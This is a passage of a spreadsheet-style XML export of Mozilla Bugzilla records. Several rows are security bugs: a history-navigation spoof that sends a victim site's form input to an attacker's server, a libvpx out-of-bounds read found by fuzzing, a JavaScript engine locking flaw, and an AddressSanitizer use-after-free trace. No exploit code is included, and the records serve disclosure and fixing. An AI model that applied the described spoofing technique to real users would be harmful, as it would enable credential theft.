        <v>3</v>
      </c>
      <c r="H2389" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2389" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2389" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K2389" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2389" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2389" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2389" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2389" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2389" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q2389" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2389" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2389" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T2389" t="n">
        <v>1</v>
      </c>
      <c r="U2389" t="n">
        <v>0</v>
      </c>
      <c r="V2389" t="n">
        <v>48</v>
      </c>
      <c r="W2389" t="inlineStr">
        <is>
          <t>This is basically another flavor of bug 687745, the impact is identical.
It is possible to confuse the URL navigation in the browser, such that the user input on a victim site is redirected to a location on the attacker's server. The bug exists in the history navigation, which incorrectly handles calls to history.forward and history.back that are immediately followed by a write to location.hash. Suppose the history object is in the following state:
[0]: 'http://attacker/' (active)
[1]: 'http://victim/'
Calling history.forward on the attacker's website will redirect a user to the victim website. If location.hash is set before the attacker's script is terminated, the history object will be in the following state after opening http://victim/:
[0]: 'http://attacker/'
[1]: 'http://attacker/#hash' (active)
There's a discrepancy between the displayed page/URL bar and the address stored in history. Calling history.back() will set baseURI back to http://attacker/ (thus all user input will be posted there), but since that's only a hash change in the "confused" history object, the page will not be reloaded and will still display the content of the victim's website. The Larry badge for HTTPS websites will also continue to show the victim's domain name.
Although, as Daniel noted in bug 687745 comment 21, as a spoof it's on par with a typical phishing attack (though with a convincing Larry badge), the attacker may delay the call to history.back until the user is busy filling out the forms. The URL shift is completely seamless and will not reset any input. I've implemented this in the PoC as a 7 second delay between the loading of Mozilla Sync login page and navigating back to change the baseURI.
Verified to work with the latest Nightly (15.0a1 2012-05-21) and the release build (12.0).</t>
        </is>
      </c>
      <c r="X2389" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2390">
      <c r="A2390" t="n">
        <v>1224361</v>
      </c>
      <c r="B2390" t="inlineStr">
        <is>
          <t>2015-11-12 14:30:42 -0800</t>
        </is>
      </c>
      <c r="C2390" t="inlineStr">
        <is>
          <t>UBSan: index out of bounds [@vp8_mb_init_dequantizer]</t>
        </is>
      </c>
      <c r="D2390" t="inlineStr">
        <is>
          <t>2016-07-02 11:35:49 -0700</t>
        </is>
      </c>
      <c r="E2390" t="n">
        <v>1</v>
      </c>
      <c r="F2390" t="n">
        <v>1</v>
      </c>
      <c r="G2390" t="n">
        <v>3</v>
      </c>
      <c r="H2390" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2390" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2390" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K2390" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2390" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2390" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2390" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2390" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2390" t="inlineStr">
        <is>
          <t>[adv-main45+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2390" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2390" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2390" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T2390" t="n">
        <v>1</v>
      </c>
      <c r="U2390" t="n">
        <v>0</v>
      </c>
      <c r="V2390" t="n">
        <v>11</v>
      </c>
      <c r="W2390" t="inlineStr">
        <is>
          <t>Created attachment 8686813
test_case.vp8
This was found by fuzzing libvpx (commit c6641709a707ccb98cbdf785428659e44d4f2c8b) and it appears to be in our branch.
https://dxr.mozilla.org/mozilla-central/source/media/libvpx/vp8/decoder/decodeframe.c#84
vp8/decoder/decodeframe.c:86:25: runtime error: index -127 out of bounds for type 'short [128][2]'
    #0 0x831de5 in vp8_mb_init_dequantizer (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x831de5)
    #1 0x836f5d in vp8_decode_frame (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x836f5d)
    #2 0x5d052d in vp8dx_receive_compressed_data (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x5d052d)
    #3 0x5ca52c in vp8_decode (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x5ca52c)
    #4 0x4ecdde in vpx_codec_decode (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x4ecdde)
    #5 0x4eb189 in main /home/user/code/libvpx/examples/simple_decoder.c:135:11
    #6 0x7f6d49488ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
    #7 0x41dad5 in _start (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x41dad5</t>
        </is>
      </c>
      <c r="X2390" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2391">
      <c r="A2391" t="n">
        <v>1407954</v>
      </c>
      <c r="B2391" t="inlineStr">
        <is>
          <t>2017-10-12 02:50:31 -0700</t>
        </is>
      </c>
      <c r="C2391" t="inlineStr">
        <is>
          <t>Links are not highlighted when long pressing on them</t>
        </is>
      </c>
      <c r="D2391" t="inlineStr">
        <is>
          <t>2017-10-26 07:27:38 -0700</t>
        </is>
      </c>
      <c r="E2391" t="n">
        <v>1</v>
      </c>
      <c r="F2391" t="n">
        <v>1</v>
      </c>
      <c r="G2391" t="n">
        <v>2</v>
      </c>
      <c r="H2391" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2391" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J2391" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2391" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2391" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2391" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N2391" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2391" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2391" t="inlineStr"/>
      <c r="Q2391" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2391" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2391" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2391" t="n">
        <v>1</v>
      </c>
      <c r="U2391" t="n">
        <v>0</v>
      </c>
      <c r="V2391" t="n">
        <v>6</v>
      </c>
      <c r="W2391" t="inlineStr">
        <is>
          <t>latest master
v9.2 (6679)
* Go to www.bbc.com and long press on a link
Expected: The link is highlighted 
Actual: The link is not highlighted 
I suspect this regressed from https://github.com/mozilla-mobile/firefox-ios/commit/12290b745248e5b40913aeb1aa7518ff68067a17</t>
        </is>
      </c>
      <c r="X2391" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2392">
      <c r="A2392" t="n">
        <v>600853</v>
      </c>
      <c r="B2392" t="inlineStr">
        <is>
          <t>2010-09-30 08:37:08 -0700</t>
        </is>
      </c>
      <c r="C2392" t="inlineStr">
        <is>
          <t>last ditch GC and OOM reporting with title lock held</t>
        </is>
      </c>
      <c r="D2392" t="inlineStr">
        <is>
          <t>2011-03-29 19:26:08 -0700</t>
        </is>
      </c>
      <c r="E2392" t="n">
        <v>1</v>
      </c>
      <c r="F2392" t="n">
        <v>1</v>
      </c>
      <c r="G2392" t="n">
        <v>3</v>
      </c>
      <c r="H2392" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2392" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2392" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2392" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2392" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2392" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2392" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2392" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2392" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q2392" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2392" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2392" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2392" t="n">
        <v>1</v>
      </c>
      <c r="U2392" t="n">
        <v>0</v>
      </c>
      <c r="V2392" t="n">
        <v>36</v>
      </c>
      <c r="W2392" t="inlineStr">
        <is>
          <t>obj_toSource contains:
        ok = obj-&gt;lookupProperty(cx, id, &amp;obj2, &amp;prop);
...
        idstr = js_ValueToString(cx, IdToValue(id));
...
        JS_UNLOCK_OBJ(cx, obj2);
Here js_ValueToString allocates a string when id is an integer. This implies that the last-ditch GC and OOM reporting will run with title lock held.
Similarly JS_SetWatchPoint contains:
    if (!js_LookupProperty(cx, obj, propid, &amp;pobj, &amp;prop))
...
        watcher = js_WrapWatchedSetter(cx, propid, shape-&gt;attributes(), shape-&gt;setter());
...
JS_UNLOCK_OBJ(cx, obj);
Here js_WrapWatchedSetter allocates at least new Function leading to the same bug.
Marking as security-sensitive as this is related to the bug 569162 and in case other places contains the similar pattern but when an arbitrary JS code can run.</t>
        </is>
      </c>
      <c r="X2392" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2393">
      <c r="A2393" t="n">
        <v>1656957</v>
      </c>
      <c r="B2393" t="inlineStr">
        <is>
          <t>2020-08-03 10:28:02 -0700</t>
        </is>
      </c>
      <c r="C2393" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-use-after-free /builds/worker/workspace/obj-build/dist/include/nsTArray.h:413:37 in Length</t>
        </is>
      </c>
      <c r="D2393" t="inlineStr">
        <is>
          <t>2021-04-06 13:12:11 -0700</t>
        </is>
      </c>
      <c r="E2393" t="n">
        <v>1</v>
      </c>
      <c r="F2393" t="n">
        <v>1</v>
      </c>
      <c r="G2393" t="n">
        <v>3</v>
      </c>
      <c r="H2393" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2393" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2393" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2393" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2393" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2393" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2393" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2393" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2393" t="inlineStr">
        <is>
          <t>[bugmon:],bisected,confirmed,[adv-main80+r][adv-esr68.12+r][adv-esr78.2+r][sec-survey]</t>
        </is>
      </c>
      <c r="Q2393" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2393" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2393" t="inlineStr">
        <is>
          <t>81 Branch</t>
        </is>
      </c>
      <c r="T2393" t="n">
        <v>1</v>
      </c>
      <c r="U2393" t="n">
        <v>0</v>
      </c>
      <c r="V2393" t="n">
        <v>30</v>
      </c>
      <c r="W2393" t="inlineStr">
        <is>
          <t>Created attachment 9167723
testcase.html
Testcase found while fuzzing mozilla-central rev 84b257d07031 (built with --enable-fuzzing).  Testcase must be served over HTTP in order to reproduce.
```
==26094==ERROR: AddressSanitizer: heap-use-after-free on address 0x60f0000617f0 at pc 0x7f82d6863c37 bp 0x7ffd199d96b0 sp 0x7ffd199d96a8
READ of size 8 at 0x60f0000617f0 thread T0 (file:// Content)
    #0 0x7f82d6863c36 in Length /builds/worker/workspace/obj-build/dist/include/nsTArray.h:413:37
    #1 0x7f82d6863c36 in Length /builds/worker/workspace/obj-build/dist/include/nsTObserverArray.h:88:44
    #2 0x7f82d6863c36 in HasMore /builds/worker/workspace/obj-build/dist/include/nsTObserverArray.h:326:55
    #3 0x7f82d6863c36 in nsAutoTObserverArray&lt;mozilla::dom::AbortFollower*, 0ul&gt;::STLIterator&lt;nsAutoTObserverArray&lt;mozilla::dom::AbortFollower*, 0ul&gt;::ForwardIterator, mozilla::dom::AbortFollower*&gt;::operator++() /builds/worker/workspace/obj-build/dist/include/nsTObserverArray.h:435:28
    #4 0x7f82d6863a34 in mozilla::dom::AbortSignalImpl::Abort() /builds/worker/checkouts/gecko/dom/abort/AbortSignal.cpp:30:32
    #5 0x7f82d68634d8 in mozilla::dom::AbortSignal::Abort() /builds/worker/checkouts/gecko/dom/abort/AbortSignal.cpp:77:20
    #6 0x7f82d6863a2c in mozilla::dom::AbortSignalImpl::Abort() /builds/worker/checkouts/gecko/dom/abort/AbortSignal.cpp:31:15
    #7 0x7f82d68634d8 in mozilla::dom::AbortSignal::Abort() /builds/worker/checkouts/gecko/dom/abort/AbortSignal.cpp:77:20
    #8 0x7f82d6f82b74 in mozilla::dom::AbortController_Binding::abort(JSContext*, JS::Handle&lt;JSObject*&gt;, void*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/obj-build/dom/bindings/AbortControllerBinding.cpp:72:24
    #9 0x7f82d89638b8 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3221:13
    #10 0x7f82df0e4f0b in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:487:13
    #11 0x7f82df0e4f0b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:579:12
    #12 0x7f82df0e71a8 in InternalCall(JSContext*, js::AnyInvokeArgs const&amp;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:642:10
    #13 0x7f82df0cd77f in CallFromStack /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:646:10
    #14 0x7f82df0cd77f in Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3314:16
    #15 0x7f82df0b0761 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:459:10
    #16 0x7f82df0e4fed in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:614:13
    #17 0x7f82df0e71a8 in InternalCall(JSContext*, js::AnyInvokeArgs const&amp;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:642:10
    #18 0x7f82df0e7486 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:659:8
    #19 0x7f82df45fe30 in js::PromiseObject::create(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, bool) /builds/worker/checkouts/gecko/js/src/builtin/Promise.cpp:2444:15
    #20 0x7f82df4a6b4f in PromiseConstructor(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/js/src/builtin/Promise.cpp:2365:7
    #21 0x7f82df0e7dc0 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:487:13
    #22 0x7f82df0e7dc0 in CallJSNativeConstructor /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:503:8
    #23 0x7f82df0e7dc0 in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:686:14
    #24 0x7f82df0e7714 in js::ConstructFromStack(JSContext*, JS::CallArgs const&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:732:10
    #25 0x7f82df0bacf2 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3304:16
    #26 0x7f82df0b0761 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:459:10
    #27 0x7f82df0e4fed in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:614:13
    #28 0x7f82df0e71a8 in InternalCall(JSContext*, js::AnyInvokeArgs const&amp;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:642:10
    #29 0x7f82df0e7486 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:659:8
    #30 0x7f82df286be0 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/jsapi.cpp:2831:10
    #31 0x7f82d86153bf in mozilla::dom::Function::Call(mozilla::dom::BindingCallContext&amp;, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp:43:8
    #32 0x7f82d6d7f887 in void mozilla::dom::Function::Call&lt;nsCOMPtr&lt;nsIGlobalObject&gt; &gt;(nsCOMPtr&lt;nsIGlobalObject&gt; const&amp;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h:73:12
    #33 0x7f82d6d7f4e8 in mozilla::dom::CallbackTimeoutHandler::Call(char const*) /builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp:167:29
    #34 0x7f82d69b9f1f in nsGlobalWindowInner::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowInner.cpp:6024:38
    #35 0x7f82d6d7abbe in mozilla::dom::TimeoutManager::RunTimeout(mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;, bool) /builds/worker/checkouts/gecko/dom/base/TimeoutManager.cpp:911:44
    #36 0x7f82d6d7950f in mozilla::dom::TimeoutExecutor::MaybeExecute() /builds/worker/checkouts/gecko/dom/base/TimeoutExecutor.cpp:179:11
    #37 0x7f82d6d7d0eb in mozilla::dom::TimeoutExecutor::Run() /builds/worker/checkouts/gecko/dom/base/TimeoutExecutor.cpp:234:5
    #38 0x7f82d2ca828e in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /builds/worker/checkouts/gecko/xpcom/threads/ThrottledEventQueue.cpp:254:22
    #39 0x7f82d2c9c48f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /builds/worker/checkouts/gecko/xpcom/threads/ThrottledEventQueue.cpp:81:15
    #40 0x7f82d2c4e0b9 in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:242:16
    #41 0x7f82d2c4a5a5 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:512:26
    #42 0x7f82d2c48462 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:371:15
    #43 0x7f82d2c4889f in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:168:36
    #44 0x7f82d2c59ec1 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:83:37
    #45 0x7f82d2c59ec1 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_4&gt;::Run() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:577:5
    #46 0x7f82d2c7ef7c in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1234:14
    #47 0x7f82d2c89e6c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:513:10
    #48 0x7f82d404a63f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:87:21
    #49 0x7f82d3f2b0e7 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:334:10
    #50 0x7f82d3f2b0e7 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:327:3
    #51 0x7f82d3f2b0e7 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:309:3
    #52 0x7f82db288c48 in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137:27
    #53 0x7f82dee72516 in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:913:20
    #54 0x7f82d3f2b0e7 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:334:10
    #55 0x7f82d3f2b0e7 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:327:3
    #56 0x7f82d3f2b0e7 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:309:3
    #57 0x7f82dee71aff in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:744:34
    #58 0x5587981768b3 in content_process_main /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #59 0x5587981768b3 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:303:18
    #60 0x7f82f6d61b96 in __libc_start_main /build/glibc-2ORdQG/glibc-2.27/csu/../csu/libc-start.c:310
0x60f0000617f0 is located 160 bytes inside of 176-byte region [0x60f000061750,0x60f000061800)
freed by thread T0 (file:// Content) here:
    #0 0x55879814394d in free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3
    #1 0x7f82d2abec82 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2419:7
    #2 0x7f82d2abe0d8 in nsCycleCollector::FreeSnowWhite(bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2607:3
    #3 0x7f82d2ac59bd in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3580:3
    #4 0x7f82d2ac51cc in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3409:9
    #5 0x7f82d2ac859e in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3907:28
    #6 0x7f82d6ea4474 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/checkouts/gecko/dom/base/nsJSEnvironment.cpp:1533:3
    #7 0x7f82d866dd71 in mozilla::dom::FuzzingFunctions_Binding::cycleCollect(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/obj-build/dom/bindings/FuzzingFunctionsBinding.cpp:68:3
    #8 0x7f82df0e4f0b in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:487:13
    #9 0x7f82df0e4f0b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:579:12
    #10 0x7f82df0e71a8 in InternalCall(JSContext*, js::AnyInvokeArgs const&amp;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:642:10
    #11 0x7f82df0cd77f in CallFromStack /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:646:10
    #12 0x7f82df0cd77f in Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3314:16
    #13 0x7f82df0b0761 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:459:10
    #14 0x7f82df0e4fed in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:614:13
    #15 0x7f82df0e71a8 in InternalCall(JSContext*, js::AnyInvokeArgs const&amp;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:642:10
    #16 0x7f82df0e7486 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:659:8
    #17 0x7f82df45fe30 in js::PromiseObject::create(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, bool) /builds/worker/checkouts/gecko/js/src/builtin/Promise.cpp:2444:15
    #18 0x7f82df4a6b4f in PromiseConstructor(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/js/src/builtin/Promise.cpp:2365:7
    #19 0x7f82df0e7dc0 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:487:13
    #20 0x7f82df0e7dc0 in CallJSNativeConstructor /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:503:8
    #21 0x7f82df0e7dc0 in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:686:14
    #22 0x7f82df0e7714 in js::ConstructFromStack(JSContext*, JS::CallArgs const&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:732:10
    #23 0x7f82df0bacf2 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3304:16
previously allocated by thread T0 (file:// Content) here:
    #0 0x558798143bcd in malloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:145:3
    #1 0x558798179cbd in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7f82d916ab89 in operator new /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7f82d916ab89 in mozilla::dom::Request::Request(nsIGlobalObject*, mozilla::SafeRefPtr&lt;mozilla::dom::InternalRequest&gt;, mozilla::dom::AbortSignal*) /builds/worker/checkouts/gecko/dom/fetch/Request.cpp:67:15
    #4 0x7f82d91724d6 in mozilla::SafeRefPtr&lt;mozilla::dom::Request&gt; mozilla::MakeSafeRefPtr&lt;mozilla::dom::Request, nsIGlobalObject*&amp;, mozilla::SafeRefPtr&lt;mozilla::dom::InternalRequest&gt;, RefPtr&lt;mozilla::dom::AbortSignal&gt;&amp;&gt;(nsIGlobalObject*&amp;, mozilla::SafeRefPtr&lt;mozilla::dom::InternalRequest&gt;&amp;&amp;, RefPtr&lt;mozilla::dom::AbortSignal&gt;&amp;) /builds/worker/workspace/obj-build/dist/include/mozilla/dom/SafeRefPtr.h:382:25
    #5 0x7f82d916f30d in mozilla::dom::Request::Constructor(nsIGlobalObject*, JSContext*, mozilla::dom::RequestOrUSVString const&amp;, mozilla::dom::RequestInit const&amp;, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/fetch/Request.cpp:609:7
